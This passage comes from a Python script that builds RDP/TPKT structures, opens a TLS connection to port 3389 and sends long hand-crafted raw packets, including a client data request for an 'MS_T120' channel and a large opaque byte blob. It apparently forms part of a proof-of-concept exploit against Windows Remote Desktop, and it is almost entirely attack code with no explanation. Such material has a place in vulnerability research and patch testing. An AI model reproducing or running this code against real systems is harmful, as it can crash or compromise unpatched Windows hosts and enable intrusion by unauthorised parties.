(\r\n\t\t('DST-REF','<H=0'),\r\n\t\t('SRC-REF','<H=0'),\r\n\t\t('CLASS-OPTION','B=0'),\r\n\t\t('Type','B=0'),\r\n\t\t('Flags','B=0'),\r\n\t\t('Length','<H=8'),\r\n\t)\r\n\r\nclass DATA_TPDU(Structure):\r\n\tcommonHdr = (\r\n\t\t('EOT','B=0x80'),\r\n\t\t('UserData',':=\"\"'),\r\n\t)\r\n\tdef __init__(self, data = None):\r\n\t\tStructure.__init__(self,data)\r\n\t\tself['UserData'] =''\r\n\r\nclass RDP_NEG_REQ(CR_TPDU):\r\n\tstructure = (\r\n\t\t('requestedProtocols','<L'),\r\n\t)\r\n\tdef __init__(self,data=None):\r\n\t\tCR_TPDU.__init__(self,data)\r\n\t\tif data is None:\r\n\t\t\tself['Type'] = 1\r\n\r\ndef send_init_packets(host):\r\n\ttpkt = TPKT()\r\n\ttpdu = TPDU()\r\n\trdp_neg = RDP_NEG_REQ()\r\n\trdp_neg['Type'] = 1\r\n\trdp_neg['requestedProtocols'] = 1\r\n\ttpdu['VariablePart'] = rdp_neg.getData()\r\n\ttpdu['Code'] = 0xe0\r\n\ttpkt['TPDU'] = tpdu.getData()\r\n\ts = socket.socket()\r\n\ts.connect((host, 3389))\r\n\ts.sendall(tpkt.getData())\r\n\ts.recv(8192)\r\n\tctx = SSL.Context(SSL.TLSv1_METHOD)\r\n\ttls = SSL.Connection(ctx,s)\r\n\ttls.set_connect_state()\r\n\ttls.do_handshake()\r\n\treturn tls\r\n\r\n# This can be fixed length now buttfuckit\r\ndef send_client_data(tls):\r\n\tp = \"\\x03\\x00\\x01\\xca\\x02\\xf0\\x80\\x7f\\x65\\x82\\x07\\xc2\\x04\\x01\\x01\\x04\\x01\\x01\\x01\\x01\\xff\\x30\\x19\\x02\\x01\\x22\\x02\\x01\\x02\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\xff\\xff\\x02\\x01\\x02\\x30\\x19\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\x04\\x20\\x02\\x01\\x02\\x30\\x1c\\x02\\x02\\xff\\xff\\x02\\x02\\xfc\\x17\\x02\\x02\\xff\\xff\\x02\\x01\\x01\\x02\\x01\\x00\\x02\\x01\\x01\\x02\\x02\\xff\\xff\\x02\\x01\\x02\\x04\\x82\\x01\\x61\\x00\\x05\\x00\\x14\\x7c\\x00\\x01\\x81\\x48\\x00\\x08\\x00\\x10\\x00\\x01\\xc0\\x00\\x44\\x75\\x63\\x61\\x81\\x34\\x01\\xc0\\xea\\x00\\x0a\\x00\\x08\\x00\\x80\\x07\\x38\\x04\\x01\\xca\\x03\\xaa\\x09\\x04\\x00\\x00\\xee\\x42\\x00\\x00\\x44\\x00\\x45\\x00\\x53\\x00\\x4b\\x00\\x54\\x00\\x4f\\x00\\x50\\x00\\x2d\\x00\\x46\\x00\\x38\\x00\\x34\\x00\\x30\\x00\\x47\\x00\\x49\\x00\\x4b\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\xca\\x01\\x00\\x00\\x00\\x00\\x00\\x18\\x00\\x0f\\x00\\xaf\\x07\\x62\\x00\\x63\\x00\\x37\\x00\\x38\\x00\\x65\\x00\\x66\\x00\\x36\\x00\\x33\\x00\\x2d\\x00\\x39\\x00\\x64\\x00\\x33\\x00\\x33\\x00\\x2d\\x00\\x34\\x00\\x31\\x00\\x39\\x38\\x00\\x38\\x00\\x2d\\x00\\x39\\x00\\x32\\x00\\x63\\x00\\x66\\x00\\x2d\\x00\\x00\\x31\\x00\\x62\\x00\\x32\\x00\\x64\\x00\\x61\\x00\\x42\\x42\\x42\\x42\\x07\\x00\\x01\\x00\\x00\\x00\\x56\\x02\\x00\\x00\\x50\\x01\\x00\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x64\\x00\\x00\\x00\\x04\\xc0\\x0c\\x00\\x15\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\xc0\\x0c\\x00\\x1b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\xc0\\x38\\x00\\x04\\x00\\x00\\x00\\x72\\x64\\x70\\x73\\x6e\\x64\\x00\\x00\\x0f\\x00\\x00\\xc0\\x63\\x6c\\x69\\x70\\x72\\x64\\x72\\x00\\x00\\x00\\xa0\\xc0\\x64\\x72\\x64\\x79\\x6e\\x76\\x63\\x00\\x00\\x00\\x80\\xc0\\x4d\\x53\\x5f\\x54\\x31\\x32\\x30\\x00\\x00\\x00\\x00\\x00\"\r\n\tsize0 = struct.pack(\">h\", len(p))\r\n\tsize1 = struct.pack(\">h\", len(p)-12)\r\n\tsize2 = struct.pack(\">h\", len(p)-109)\r\n\tsize3 = struct.pack(\">h\", len(p)-118)\r\n\tsize4 = struct.pack(\">h\", len(p)-132)\r\n\tsize5 = struct.pack(\">h\", len(p)-390)\r\n\tba = bytearray()\r\n\tba.extend(map(ord, p))\r\n\tba[2] = size0[0]\r\n\tba[3] = size0[1]\r\n\tba[10] = size1[0]\r\n\tba[11] = size1[1]\r\n\tba[107] = size2[0]\r\n\tba[108] = size2[1]\r\n\tba[116] = 0x81\r\n\tba[117] = size3[1] \r\n\tba[130] = 0x81\r\n\tba[131] = size4[1]\r\n\tba[392] = size5[1]\r\n\ttls.sendall(bytes(ba))\r\n\ttls.recv(8192)\r\n\r\ndef send_client_info(tls):\r\n\tp = b\"\\x03\\x00\\x01\\x61\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x81\\x52\\x40\\x00\\xa1\\xa5\\x09\\x04\\x09\\x04\\xbb\\x47\\x03\\x00\\x00\\x00\\x0e\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x41\\x00\\x00\\x00\\x74\\x00\\x65\\x00\\x73\\x00\\x74\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x1c\\x00\\x31\\x00\\x39\\x00\\x32\\x00\\x2e\\x00\\x41\\x41\\x41\\x00\\x38\\x00\\x2e\\x00\\x32\\x00\\x33\\x00\\x32\\x00\\x2e\\x00\\x31\\x00\\x00\\x00\\x40\\x00\\x43\\x00\\x3a\\x00\\x5c\\x00\\x57\\x00\\x49\\x00\\x4e\\x00\\x41\\x41\\x41\\x00\\x57\\x00\\x53\\x00\\x5c\\x00\\x73\\x00\\x79\\x00\\x73\\x00\\x74\\x00\\x65\\x00\\x6d\\x00\\x33\\x00\\x32\\x00\\x5c\\x00\\x6d\\x00\\x73\\x00\\x74\\x00\\x73\\x00\\x63\\x00\\x61\\x00\\x78\\x00\\x2e\\x00\\x64\\x00\\x6c\\x00\\x6c\\x00\\x00\\x00\\xa4\\x01\\x00\\x00\\x4d\\x00\\x6f\\x00\\x75\\x00\\x6e\\x00\\x74\\x00\\x61\\x00\\x69\\x00\\x6e\\x00\\x20\\x00\\x53\\x00\\x74\\x00\\x61\\x00\\x6e\\x00\\x64\\x00\\x61\\x00\\x72\\x00\\x64\\x00\\x20\\x00\\x54\\x00\\x69\\x00\\x6d\\x00\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0b\\x00\\x00\\x00\\x01\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x4d\\x00\\x6f\\x00\\x75\\x00\\x6e\\x00\\x74\\x00\\x61\\x00\\x69\\x00\\x6e\\x00\\x20\\x00\\x44\\x00\\x61\\x00\\x79\\x00\\x6c\\x00\\x69\\x00\\x67\\x00\\x68\\x00\\x74\\x00\\x20\\x00\\x54\\x00\\x69\\x00\\x6d\\x00\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x03\\x00\\x00\\x00\\x02\\x00\\x02\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xc4\\xff\\xff\\xff\\x01\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x64\\x00\\x00\\x00\"\r\n\ttls.sendall(p)\r\n\r\ndef send_channel_packets(tls):\r\n\tp1 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x04\\x01\\x00\\x01\\x00\"\r\n\ttls.sendall(p1)\r\n\tp2 = b\"\\x03\\x00\\x00\\x08\\x02\\xf0\\x80\\x28\"\r\n\ttls.sendall(p2)\r\n\ttls.recv(1024)\r\n\tp4 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xeb\"\r\n\ttls.sendall(p4)\r\n\ttls.recv(1024)\r\n\tp5 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xec\"\r\n\ttls.sendall(p5)\r\n\ttls.recv(1024)\r\n\tp6 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xed\"\r\n\ttls.sendall(p6)\r\n\ttls.recv(1024)\r\n\tp7 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xee\"\r\n\ttls.sendall(p7)\r\n\ttls.recv(1024)\r\n\tp8 = b\"\\x03\\x00\\x00\\x0c\\x02\\xf0\\x80\\x38\\x00\\x07\\x03\\xef\"\r\n\ttls.sendall(p8)\r\n\ttls.recv(1024)\r\n\r\ndef send_confirm_active(tls, shareid):\r\n\tp = \"\\x03\\x00\\x02\\x63\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x82\\x54\\x54\\x02\\x13\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\xea\\x03\\x06\\x00\\x3e\\x02\\x4d\\x53\\x54\\x53\\x43\\x00\\x17\\x00\\x00\\x00\\x01\\x00\\x18\\x00\\x01\\x00\\x03\\x00\\x00\\x02\\x00\\x00\\x00\\x00\\x1d\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x1c\\x00\\x20\\x00\\x01\\x00\\x01\\x00\\x01\\x00\\x80\\x07\\x38\\x04\\x00\\x00\\x01\\x00\\x01\\x00\\x00\\x1a\\x01\\x00\\x00\\x00\\x03\\x00\\x58\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\xaa\\x00\\x01\\x01\\x01\\x01\\x01\\x00\\x00\\x01\\x01\\x01\\x00\\x01\\x00\\x00\\x00\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x01\\x00\\x01\\x01\\x01\\x00\\x00\\x00\\x00\\x00\\xa1\\x06\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x84\\x03\\x00\\x00\\x00\\x00\\x00\\xe4\\x04\\x00\\x00\\x13\\x00\\x28\\x00\\x03\\x00\\x00\\x03\\x78\\x00\\x00\\x00\\x78\\x00\\x00\\x00\\xfc\\x09\\x00\\x80\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0a\\x00\\x08\\x00\\x06\\x00\\x00\\x00\\x07\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x05\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x02\\x00\\x08\\x00\\x0a\\x00\\x01\\x00\\x14\\x00\\x15\\x00\\x09\\x00\\x08\\x00\\x00\\x00\\x00\\x00\\x0d\\x00\\x58\\x00\\x91\\x00\\x20\\x00\\x09\\x04\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x0c\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x0e\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x10\\x00\\x34\\x00\\xfe\\x00\\x04\\x00\\xfe\\x00\\x04\\x00\\xfe\\x00\\x08\\x00\\xfe\\x00\\x08\\x00\\xfe\\x00\\x10\\x00\\xfe\\x00\\x20\\x00\\xfe\\x00\\x40\\x00\\xfe\\x00\\x80\\x00\\xfe\\x00\\x00\\x01\\x40\\x00\\x00\\x08\\x00\\x01\\x00\\x01\\x03\\x00\\x00\\x00\\x0f\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x11\\x00\\x0c\\x00\\x01\\x00\\x00\\x00\\x00\\x28\\x64\\x00\\x14\\x00\\x0c\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x15\\x00\\x0c\\x00\\x02\\x00\\x00\\x00\\x00\\x0a\\x00\\x01\\x1a\\x00\\x08\\x00\\xaf\\x94\\x00\\x00\\x1c\\x00\\x0c\\x00\\x12\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1b\\x00\\x06\\x00\\x01\\x00\\x1e\\x00\\x08\\x00\\x01\\x00\\x00\\x00\\x18\\x00\\x0b\\x00\\x02\\x00\\x00\\x00\\x03\\x0c\\x00\\x1d\\x00\\x5f\\x00\\x02\\xb9\\x1b\\x8d\\xca\\x0f\\x00\\x4f\\x15\\x58\\x9f\\xae\\x2d\\x1a\\x87\\xe2\\xd6\\x01\\x03\\x00\\x01\\x01\\x03\\xd4\\xcc\\x44\\x27\\x8a\\x9d\\x74\\x4e\\x80\\x3c\\x0e\\xcb\\xee\\xa1\\x9c\\x54\\x05\\x31\\x00\\x31\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x25\\x00\\x00\\x00\\xc0\\xcb\\x08\\x00\\x00\\x00\\x01\\x00\\xc1\\xcb\\x1d\\x00\\x00\\x00\\x01\\xc0\\xcf\\x02\\x00\\x08\\x00\\x00\\x01\\x40\\x00\\x02\\x01\\x01\\x01\\x00\\x01\\x40\\x00\\x02\\x01\\x01\\x04\"\r\n\tba = bytearray()\r\n\tba.extend(map(ord, p))\r\n\ttls.sendall(bytes(ba))\r\n\r\ndef send_establish_session(tls):\r\n\tp = b\"\\x03\\x00\\x00\\x24\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x16\\x16\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x08\\x00\\x1f\\x00\\x00\\x00\\x01\\x00\\xea\\x03\"\r\n\ttls.sendall(p)\r\n\tp = b\"\\x03\\x00\\x00\\x28\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x1a\\x1a\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x0c\\x00\\x14\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\ttls.sendall(p)\r\n\tp = b\"\\x03\\x00\\x00\\x28\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x1a\\x1a\\x00\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x0c\\x00\\x14\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\r\n\ttls.sendall(p)\r\n\tp = b\"\\x03\\x00\\x05\\x81\\x02\\xf0\\x80\\x64\\x00\\x07\\x03\\xeb\\x70\\x85\\x72\\x72\\x05\\x17\\x00\\xf0\\x03\\xea\\x03\\x01\\x00\\x00\\x01\\x00\\x00\\x2b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xa9\\x00\\x00\\x00\\x00\\x00\\x02\\x00\\x00\\x00\\xa3\\xce\\x20\\x35\\xdb\\x94\\xa5\\xe6\\x0d\\xa3\\x8c\\xfb\\x64\\xb7\\x63\\xca\\xe7\\x9a\\x84\\xc1\\x0d\\x67\\xb7\\x91\\x76\\x71\\x21\\xf9\\x67\\x96\\xc0\\xa2\\x77\\x5a\\xd8\\xb2\\x74\\x4f\\x30\\x35\\x2b\\xe7\\xb0\\xd2\\xfd\\x81\\x90\\x1a\\x8f\\xd5\\x5e\\xee\\x5a\\x6d\\xcb\\xea\\x2f\\xa5\\x2b\\x06\\xe9\\x0b\\x0b\\xa6\\xad\\x01\\x2f\\x7a\\x0b\\x7c\\xff\\x89\\xd3\\xa3\\xe1\\xf8\\x00\\x96\\xa6\\x8d\\x9a\\x42\\xfc\\xab\\x14\\x05\\x8f\\x16\\xde\\xc8\\x05\\xba\\xa0\\xa8\\xed\\x30\\xd8\\x67\\x82\\xd7\\x9f\\x84\\xc3\\x38\\x27\\xda\\x61\\xe3\\xa8\\xc3\\x65\\xe6\\xec\\x0c\\xf6\\x36\\x24\\xb2\\x0b\\xa6\\x17\\x1f\\x46\\x30\\x16\\xc7\\x73\\x60\\x14\\xb5\\xf1\\x3a\\x3c\\x95\\x7d\\x7d\\x2f\\x74\\x7e\\x56\\xff\\x9c\\xe0\\x01\\x32\\x9d\\xf2\\xd9\\x35\\x5e\\x95\\x78\\x2f\\xd5\\x15\\x6c\\x18\\x34\\x0f\\x43\\xd7\\x2b\\x97\\xa9\\xb4\\x28\\xf4\\x73\\x6c\\x16\\xdb\\x43\\xd7\\xe5\\x58\\x0c\\x5a\\x03\\xe3\\x73\\x58\\xd7\\xd9\\x76\\xc2\\xfe\\x0b\\xd7\\xf4\\x12\\x43\\x1b\\x70\\x6d\\x74\\xc2\\x3d\\xf1\\x26\\x60\\x58\\x80\\x31\\x07\\x0e\\x85\\xa3\\x95\\xf8\\x93\\x76\\x99\\x9f\\xec\\xa0\\xd4\\x95\\x5b\\x05\\xfa\\x4f\\xdf\\x77\\x8a\\x7c\\x29\\x9f\\x0b\\x4f\\xa1\\xcb\\xfa\\x95\\x66\\xba\\x47\\xe3\\xb0\\x44\\xdf\\x83\\x03\\x44\\x24\\xf4\\x1e\\xf2\\xe5\\xcb\\xa9\\x53\\x04\\xc2\\x76\\xcb\\x4d\\xc6\\xc2\\xd4\\x3f\\xd3\\x8c\\xb3\\x7c\\xf3\\xaa\\xf3\\x93\\xfe\\x25\\xbd\\x32\\x7d\\x48\\x6e\\x93\\x96\\x68\\xe5\\x18\\x2b\\xea\\x84\\x25\\x69\\x02\\xa5\\x38\\x65\\x6f\\x0f\\x9f\\xf6\\xa1\\x3a\\x1d\\x22\\x9d\\x3f\\x6d\\xe0\\x4c\\xee\\x8b\\x24\\xf0\\xdc\\xff\\x70\\x52\\xa7\\x0d\\xf9\\x52\\x8a\\x1e\\x33\\x1a\\x30\\x11\\x15\\xd7\\xf8\\x95\\xa9\\xbb\\x74\\x25\\x8c\\xe3\\xe9\\x93\\x07\\x43\\xf5\\x50\\x60\\xf7\\x96\\x2e\\xd3\\xff\\x63\\xe0\\xe3\\x24\\xf1\\x10\\x3d\\x8e\\x0f\\x56\\xbc\\x2e\\xb8\\x90\\x0c\\xfa\\x4b\\x96\\x68\\xfe\\x59\\x68\\x21\\xd0\\xff\\x52\\xfe\\x5c\\x7d\\x90\\xd4\\x39\\xbe\\x47\\x9d\\x8e\\x7a\\xaf\\x95\\x4f\\x10\\xea\\x7b\\x7a\\xd3\\xca\\x07\\x28\\x3e\\x4e\\x4b\\x81\\x0e\\xf1\\x5f\\x1f\\x8d\\xbe\\x06\\x40\\x27\\x2f\\x4a\\x03\\x80\\x32\\x67\\x54\\x2f\\x93\\xfd\\x25\\x5d\\x6d\\xa0\\xad\\x23\\x45\\x72\\xff\\xd1\\xeb\\x5b\\x51\\x75\\xa7\\x61\\xe0\\x3f\\xe4\\xef\\xf4\\x96\\xcd\\xa5\\x13\\x8a\\xe6\\x52\\x74\\x70\\xbf\\xc1\\xf9\\xfb\\x68\\x9e\\xdd\\x72\\x8f\\xb4\\x44\\x5f\\x3a\\xcb\\x75\\x2a\\x20\\xa6\\x69\\xd2\\x76\\xf9\\x57\\x46\\x2b\\x5b\\xda\\xba\\x0f\\x9b\\xe0\\x60\\xe1\\x8b\\x90\\x33\\x41\\x0a\\x2d\\xc5\\x06\\xfe\\xd0\\xf0\\xfc\\xde\\x35\\xd4\\x1e\\xaa\\x76\\x0b\\xae\\xf4\\xd5\\xbd\\xfa\\xf3\\x55\\xf5\\xc1\\x67\\x65\\x75\\x1c\\x1d\\x5e\\xe8\\x3a\\xfe\\x54\\x50\\x23\\x04\\xae\\x2e\\x71\\xc2\\x76\\x97\\xe6\\x39\\xc6\\xb2\\x25\\x87\\x92\\x63\\x52\\x61\\xd1\\x6c\\x07\\xc1\\x1c\\x00\\x30\\x0d\\xa7\\x2f\\x55\\xa3\\x4f\\x23\\xb2\\x39\\xc7\\x04\\x6c\\x97\\x15\\x7a\\xd7\\x24\\x33\\x91\\x28\\x06\\xa6\\xe7\\xc3\\x79\\x5c\\xae\\x7f\\x50\\x54\\xc2\\x38\\x1e\\x90\\x23\\x1d\\xd0\\xff\\x5a\\x56\\xd6\\x12\\x91\\xd2\\x96\\xde\\xcc\\x62\\xc8\\xee\\x9a\\x44\\x07\\xc1\\xec\\xf7\\xb6\\xd9\\x9c\\xfe\\x30\\x1c\\xdd\\xb3\\x3b\\x93\\x65\\x3c\\xb4\\x80\\xfb\\xe3\\x87\\xf0\\xee\\x42\\xd8\\xcf\\x08\\x98\\x4d\\xe7\\x6b\\x99\\x0a\\x43\\xed\\x13\\x72\\x90\\xa9\\x67\\xfd\\x3c\\x63\\x36\\xec\\x55\\xfa\\xf6\\x1f\\x35\\xe7\\x28\\xf3\\x87\\xa6\\xce\\x2e\\x34\\xaa\\x0d\\xb2\\xfe\\x17\\x18\\xa2\\x0c\\x4e\\x5f\\xf0\\xd1\\x98\\x62\\x4a\\x2e\\x0e\\xb0\\x8d\\xb1\\x7f\\x32\\x52\\x8e\\x87\\xc9\\x68\\x7c\\x0c\\xef\\xee\\x88\\xae\\x74\\x2a\\x33\\xff\\x4b\\x4d\\xc5\\xe5\\x18\\x38\\x74\\xc7\\x28\\x83\\xf7\\x72\\x87\\xfc\\x79\\xfb\\x3e\\xce\\xd0\\x51\\x13\\x2d\\x7c\\xb4\\x58\\xa2\\xe6\\x28\\x67\\x4f\\xec\\xa6\\x81\\x6c\\xf7\\x9a\\x29\\xa6\\x3b\\xca\\xec\\xb8\\xa1\\x27\\x50\\xb7\\xef\\xfc\\x81\\xbf\\x5d\\x86\\x20\\x94\\xc0\\x1a\\x0c\\x41\\x50\\xa9\\x5e\\x10\\x4a\\x82\\xf1\\x74\\x1f\\x78\\x21\\xf5\\x70\\x61\\x24\\x00\\x3d\\x47\\x5f\\xf3\\x25\\x80\\x3c\\x4b\\xea\\xa3\\xf4\\x77\\xea\\xa1\\x42\\x1a\\x17\\x0f\\x6d\\xa8\\x35\\x9e\\x91\\x26\\x34\\x43\\x04\\xc6\\xc6\\x5b\\x21\\x7d\\x8c\\xc7\\x22\\x91\\x7b\\x2c\\x2d\\x2f\\xd6\\x7e\\xa5\\x52\\xa8\\x08\\x80\\xeb\\x60\\xd1\\x44\\x09\\x8e\\x3c\\xa1\\xaa\\x67\\x60\\x0a\\x26\\xc6\\xb5\\xc6\\x79\\xa6\\x4f\\x8b\\x8c\\x25\\x5c\\xf1\\x0b\\x23\\xf4\\xd8\\xa6\\x6d\\xf1\\x91\\x78\\xf9\\xe5\\x2a\\x50\\x2f\\x5a\\x44\\x22\\xd9\\x19\\x5c\\xaf\\xd6\\xac\\x97\\xa2\\xf8\\x0d\\x0c\\xe3\\xdd\\x88\\x48\\x98\\x28\\x0b\\x8b\\xbd\\x76\\xdc\\xde\\xca\\xe2\\xc2\\x4a\\x87\\x50\\xd4\\x8c\\x77\\x5a\\xd8\\xb2\\x74\\x4f\\x30\\x35\\xbf\\x28\\xae\\xd9\\xa2\\x98\\xa5\\xbc\\x60\\xca\\xb8\\x90\\x4d\\x20\\x46\\xd9\\x8a\\x1a\\x30\\x01\\x8b\\x38\\x63\\x1a\\x57\\x09\\x51\\x46\\x95\\x9b\\xd8\\x80\\x0c\\xb0\\x77\\x24\\xbf\\x2b\\xd3\\x57\\x22\\xd9\\x19\\x5c\\xaf\\xd6\\xac\\x97\\xa2\\xf8\\x0d\\x0c\\xe3\\xdd\\x88\\x48\\x98\\x28\\x0b\\x8b\\xbd\\x76\\xdc\\xde\\xca\\xe2\\xc2\\x4a\\x87\\x50\\xd4\\x8c\\x56\\x92\\x38\\xed\\x6b\\x9b\\x5b\\x1f\\xba\\x53\\xa1\\x0e\\xf7\\x75\\x10\\x53\\x22\\x4c\\x0a\\x75\\x88\\x54\\x69\\x3f\\x3b\\xf3\\x18\\x67\\x6b\\x0f\\x19\\xd1\\x00\\x25\\x86\\xcd\\xa8\\xd9\\xdd\\x1d\\x8d\\x26\\x87\\x54\\xd9\\x79\\xc0\\x74\\x65\\x90\\xd7\\x33\\x32\\xaf\\xba\\x9d\\x5a\\xd5\\x6c\\x7c\\xa1\\x47\\xe1\\x49\\x6e\\x1c\\xce\\x9f\\x62\\xaa\\x26\\x16\\x3f\\x3c\\xec\\x5b\\x49\\xe5\\xc0\\x60\\xd4\\xbe\\xa7\\x88\\xbc\\xa1\\x9f\\x29\\x71\\x8c\\xeb\\x69\\xf8\\x73\\xfb\\xaf\\x29\\xaa\\x40\\x1b\\xe5\\x92\\xd2\\x77\\xa7\\x2b\\xfb\\xb6\\x77\\xb7\\x31\\xfb\\xdc\\x1e\\x63\\x63\\x7d\\xf2\\xfe\\x3c\\x6a\\xba\\x0b\\x20\\xcb\\x9d\\x64\\xb8\\x31\\x14\\xe2\\x70\\x07\\x2c\\xdf\\x9c\\x6f\\xb5\\x3a\\xc4\\xd5\\xb5\\xc9\\x3e\\x9a\\xd7\\xd5\\x30\\xdc\\x0e\\x19\\x89\\xc6\\x08\\x88\\xe1\\xca\\x81\\xa6\\x28\\xdd\\x9c\\x74\\x05\\x11\\xe7\\xe1\\xcc\\xbc\\xc7\\x76\\xdd\\x55\\xe2\\xcc\\xc2\\xcb\\xd3\\xb6\\x48\\x01\\xdd\\xff\\xba\\xca\\x31\\xab\\x26\\x44\\x1c\\xdc\\x06\\x01\\xdf\\xf2\\x90\\x50\\xb8\\x6b\\x8f\\xe8\\x29\\xf0\\xba\\xec\\xfb\\x2d\\xfd\\x7a\\xfc\\x7f\\x57\\xbd\\xea\\x90\\xf7\\xcf\\x92\\x1e\\xc4\\x20\\xd0\\xb6\\x9f\\xd6\\xdc\\xa1\\x82\\xa9\\x6c\\x5e\\x3e\\x83\\x41\\x57\\x73\\xe9\\xe7\\x5a\\x3f\\xda\\x24\\x4f\\x73\\x5e\\xf4\\xe0\\x92\\x24\\xbd\\x0b\\xd0\\x3c\\x49\\x96\\xb5\\xb5\\x05\\x32\\xcb\\x58\\x1d\\x6f\\x97\\x51\\xee\\x0c\\xdc\\x0b\\x2a\\x60\\xef\\x97\\x3e\\x5a\\x30\\x81\\x15\\x91\\xcf\\x11\\x07\\x25\\x2c\\x41\\xdb\\x70\\x72\\xe1\\x75\\xf6\\xa5\\xff\\xe8\\x44\\xe7\\x03\\xe3\\x61\\xaa\\xdb\\xe0\\x07\\x3d\\x07\\x0b\\xe3\\x5c\\x09\\xa9\\x5e\\x10\\xfd\\xcf\\x74\\x9e\\x23\\xf1\\x30\\x86\\x16\\xef\\x25\\x4e\\xfe\\xa4\\x93\\xa5\\x80\\x0a\\x01\\x39\\xcc\\x11\\x7a\\x6e\\x94\\x22\\x5b\\xd8\\xc6\\xc9\\xa8\\xdf\\x13\\x96\\xb3\\x91\\x33\\x6e\\x87\\xbb\\x94\\x63\\x2d\\x88\\x64\\xa7\\x58\\x89\\xda\\xdc\\x7f\\x2a\\xe3\\xa1\\x66\\xe5\\xc8\\x7f\\xc2\\xdb\\xc7\\x7d\\x2f\\xa9\\x46\\x28\\x45\\x69\\xbc\\xac\\x9f\\x85\\x9e\\xb0\\x9f\\x9a\\x49\\xb4\\xb1\\xcb\"\r\n\ttls.sendall(p)\r\n\tp = 